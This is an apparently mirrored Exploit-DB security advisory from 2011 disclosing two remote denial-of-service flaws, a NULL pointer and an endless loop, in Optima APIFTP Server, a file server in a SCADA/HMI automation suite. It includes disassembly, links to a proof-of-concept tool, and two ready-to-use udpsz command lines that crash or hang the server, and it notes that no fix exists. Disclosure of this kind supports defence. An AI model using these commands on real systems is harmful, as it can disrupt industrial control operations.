optima apiftp server 1.5.2.13 – Multiple Vulnerabilities

• Exploit Database
• 108 阅读

• 作者： Luigi Auriemma
  日期： 2011-11-14
• 类别：

  • dos
  平台：

  • windows
• 来源：https://www.exploit-db.com/exploits/18112/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105

  #######################################################################   Luigi Auriemma   Application:Optima APIFTP Server http://www.optimalog.com/home.html Versions: <= 1.5.2.13 Platforms:Windows Bugs: A] NULL pointer B] endless loop Exploitation: remote Date: 13 Nov 2011 Author: Luigi Auriemma e-mail: aluigi@autistici.org web:aluigi.org     #######################################################################     1) Introduction 2) Bugs 3) The Code 4) Fix     #######################################################################   =============== 1) Introduction ===============     Optima is a suite of automation software for controlling PLC via SCADA/HMI interface. APIFTP Server is a file server for working with remote files located on shared folders.     #######################################################################   ======= 2) Bugs =======   --------------- A] NULL pointer ---------------   NULL pointer exploitable through too long path names. The effect is the displaying of a MessageBox with the error and the continuing of the execution that will lead to a stack exaustion after some seconds and the termination of the server.     --------------- B] endless loop ---------------   Endless loop with CPU at 100% caused by incomplete packets:   004A9C93 8B03 /MOV EAX,DWORD PTR DS:[EBX] 004A9C95 8B80 78010000|MOV EAX,DWORD PTR DS:[EAX+178] 004A9C9B 2D B80B0000|SUB EAX,0BB8 ; Switch (cases BB8..BE0) 004A9CA0 74 19|JE SHORT APIFTPSe.004A9CBB 004A9CA2 83E8 14|SUB EAX,14 004A9CA5 74 47|JE SHORT APIFTPSe.004A9CEE 004A9CA7 83E8 0A|SUB EAX,0A 004A9CAA 0F84 9D000000|JE APIFTPSe.004A9D4D 004A9CB0 83E8 0A|SUB EAX,0A 004A9CB3 0F84 CA000000|JE APIFTPSe.004A9D83 004A9CB9^EB D8|JMP SHORT APIFTPSe.004A9C93     #######################################################################   =========== 3) The Code ===========     http://aluigi.org/testz/udpsz.zip https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/18112.zip   A] udpsz -C "e803 0400 ff" -T -D -3 -d SERVER 10260 0x107   wait some seconds, the tool will quit automatically   B] udpsz -C "e803 0400 00" -T -D SERVER 10260 -1     #######################################################################   ====== 4) Fix ======     No fix.     #######################################################################